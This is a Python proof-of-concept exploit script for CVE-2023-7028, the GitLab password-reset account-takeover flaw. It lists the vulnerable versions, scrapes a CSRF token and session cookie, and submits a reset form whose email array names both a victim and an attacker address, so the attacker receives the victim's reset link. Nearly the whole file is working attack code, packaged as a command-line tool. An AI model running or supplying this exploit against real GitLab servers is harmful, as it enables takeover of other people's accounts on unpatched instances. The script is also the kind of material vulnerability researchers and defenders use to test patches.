# Author: Thanh Lam
# Description: CVE-2023-7028 - GitLab account takeover via the password-reset form.
#   Submitting user[email][] as an array makes GitLab send the reset link to every
#   address listed, including an unverified attacker-controlled one.
# All instances of GitLab CE/EE running the following versions were vulnerable
# (patched in 16.1.6, 16.2.9, 16.3.7, 16.4.5, 16.5.6, 16.6.4 and 16.7.2):
# 16.1 to 16.1.5
# 16.2 to 16.2.8
# 16.3 to 16.3.6
# 16.4 to 16.4.4
# 16.5 to 16.5.5
# 16.6 to 16.6.3
# 16.7 to 16.7.1
import argparse
import re
from urllib.parse import urlencode
import requests
from colorama import Style, Fore
def print_colored_message(message, color):
    """Print ``message`` in the given colorama ``color`` and reset the style afterwards."""
    print(color, message, Style.RESET_ALL, sep="")
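def get_token(hostname, client=None):
    """Fetch a CSRF token and a fresh session cookie from the password-reset page.

    Args:
        hostname: Base URL of the GitLab instance, e.g. ``http://ip:port``.
            A trailing slash is tolerated.
        client: Optional object exposing a ``requests``-style ``get`` method.
            Defaults to the ``requests`` module; exists so the response
            parsing can be exercised without network access.

    Returns:
        ``{'token': <authenticity_token>, 'session': <_gitlab_session cookie>}``.

    Raises:
        RuntimeError: if the page carries no authenticity token or no
            ``_gitlab_session`` cookie (not a GitLab reset page, or markup
            this parser does not recognise). The original raised a bare
            ``IndexError``/``KeyError`` in the same situations.
    """
    http = requests if client is None else client
    # verify=False: the PoC targets lab / self-signed instances. It also exposes
    # the token and cookie to anyone on path, so never run it over a network you
    # do not trust against a host you care about.
    response = http.get(f"{hostname.rstrip('/')}/users/password/new", verify=False)

    # Match only the name/value pair; anchoring on the trailing
    # ``autocomplete="off" />`` markup made the original match brittle.
    token_match = re.search(r'name="authenticity_token"\s+value="([^"]*)"', response.text)
    if token_match is None:
        raise RuntimeError("authenticity_token not found on /users/password/new")

    # Prefer the parsed cookie jar (robust to several Set-Cookie headers being
    # joined into one string); fall back to the raw header for clients without one.
    session = None
    cookies = getattr(response, "cookies", None)
    if cookies is not None:
        session = cookies.get("_gitlab_session")
    if not session:
        raw = response.headers.get("Set-Cookie", "")
        cookie_match = re.search(r"_gitlab_session=([^;]*)", raw)
        session = cookie_match.group(1) if cookie_match else None
    if not session:
        raise RuntimeError("_gitlab_session cookie not set by /users/password/new")

    return {"token": token_match.group(1), "session": session}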
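def exploit(hostname, victim_email, attacker_email):
    """Submit one password-reset request naming both the victim's and the
    attacker's address.

    Vulnerable releases deliver the reset link to every address in the
    ``user[email][]`` array, so the attacker's mailbox receives a link for the
    victim's account. This function only confirms that GitLab *accepted* the
    form (the generic "If your email address exists..." banner). The same
    banner appears when the victim address is unknown or the instance is
    patched, so a usable link still has to be checked for in the attacker
    mailbox.

    Args:
        hostname: Base URL of the target, e.g. ``http://ip:port``.
        victim_email: Address registered to the account to take over.
        attacker_email: Address the attacker can read.

    Returns:
        ``True`` if the reset banner came back, ``False`` on a request failure
        or any other response. (The original printed the same messages and
        returned ``None``; callers that ignore the result are unaffected.)
    """
    base = hostname.rstrip("/")
    url = f"{base}/users/password"

    print_colored_message("[PROCESS...] Leaking Token and Cookie!\n", Fore.BLUE)
    try:
        creds = get_token(base)
        print_colored_message(
            f"[INFO] Token: {creds['token']}\n[INFO] Cookie :{creds['session']}\n",
            Fore.YELLOW,
        )

        # doseq=True expands the two-element list into two ``user[email][]``
        # fields; that repeated array parameter is the whole vulnerability.
        body = urlencode(
            {
                "authenticity_token": creds["token"],
                "user[email][]": [victim_email, attacker_email],
            },
            doseq=True,
        )
        # Content-Length is left to requests. A hand-set value that disagrees
        # with the actual body is a truncation/smuggling bug, not a feature.
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Connection": "close",
            "Cookie": f"_gitlab_session={creds['session']}",
        }

        print_colored_message("[PROCESS...] Sending Payload!\n", Fore.BLUE)
        # verify=False: lab / self-signed targets only; see get_token.
        page = requests.post(url, headers=headers, data=body, verify=False).text
    except requests.RequestException as exc:
        print_colored_message(f"[ERROR] Request failed: {exc}\n", Fore.RED)
        return False

    accepted = (
        "If your email address exists in our database, you will receive a password "
        "recovery link at your email address in a few minutes."
    ) in page
    if accepted:
        print_colored_message(
            f"[RESULT] Emails sent to {victim_email} and {attacker_email}!\n", Fore.GREEN
        )
    else:
        print_colored_message("[ERROR] Error! @@\n", Fore.RED)
    return accepted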
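if __name__ == '__main__':
    # Command-line entry point: parse the target and the two addresses, then
    # run the single-request exploit.
    parser = argparse.ArgumentParser(
        add_help=True,
        description='Tool exploit CVE-2023-7028 on gitlab',
        # %(prog)s: the script is "CVE-2023-7028 PoC.py", not "CVE-2023-7028",
        # so the previously hard-coded name in the usage line was wrong.
        usage="python3 %(prog)s -u http://ip:port -v victim_email -a attacker_email",
    )
    parser.add_argument("-u", "--url", required=True,
                        help="Gitlab url (http:// or https://, host and port only)")
    parser.add_argument("-v", "--victim", required=True, help="victim email")
    parser.add_argument("-a", "--attacker", required=True, help="attacker email")
    args = parser.parse_args()

    url = args.url.rstrip("/")
    if not url.startswith(("http://", "https://")):
        # Without a scheme every request would fail deep inside requests with
        # an obscure MissingSchema error; reject it up front instead.
        parser.error("--url must start with http:// or https://")
    victim = args.victim
    attacker = args.attacker
    exploit(url, victim, attacker)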